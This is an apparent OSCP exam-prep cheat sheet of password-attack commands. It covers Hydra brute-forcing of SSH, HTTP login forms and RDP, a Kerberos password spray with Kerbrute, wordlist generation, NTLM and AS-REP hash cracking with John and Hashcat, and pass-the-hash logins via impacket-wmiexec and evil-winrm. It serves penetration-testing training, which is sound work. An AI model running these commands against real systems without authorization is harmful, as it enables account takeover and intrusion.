######################################################################
# 08 – PASSWORD & BRUTE-FORCE ATTACKS (OSCP 2025)
######################################################################

===============================
# 1. Hydra – SSH
===============================
hydra -l admin -P rockyou.txt ssh://$targetip

===============================
# 2. Hydra – HTTP POST Login
===============================
hydra -l admin -P rockyou.txt $targetip http-post-form \
"/login.php:user=^USER^&pass=^PASS^:F=invalid"

===============================
# 3. Hydra – RDP
===============================
hydra -l Administrator -P rockyou.txt rdp://$targetip

===============================
# 4. Kerbrute – Password Spray (Kerberos Safe)
===============================
kerbrute passwordspray -d $domain --dc $targetip users.txt 'Password1!'

===============================
# 5. Wordlist Generation (CEWL / CRUNCH)
===============================
# Generate from website
cewl http://$targetip -w words.txt

# Generate brute-force wordlist
crunch 6 8 abc123 -o crunch.txt

===============================
# 6. John the Ripper
===============================
# Crack NTLM
john ntlm.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Show cracked
john ntlm.txt --show

===============================
# 7. Hashcat Basic Modes
===============================
hashcat -m 1000 ntlm.txt rockyou.txt
hashcat -m 18200 asrep.txt rockyou.txt

===============================
# 8. Pass-the-Hash Attacks
===============================
impacket-wmiexec $domain/$user@$targetip -hashes <LMHASH:NTLMHASH>
evil-winrm -i $targetip -u $user -H <NTLMHASH>

######################################################################
# END OF 08_PASSWORD_ATTACKS.TXT
######################################################################
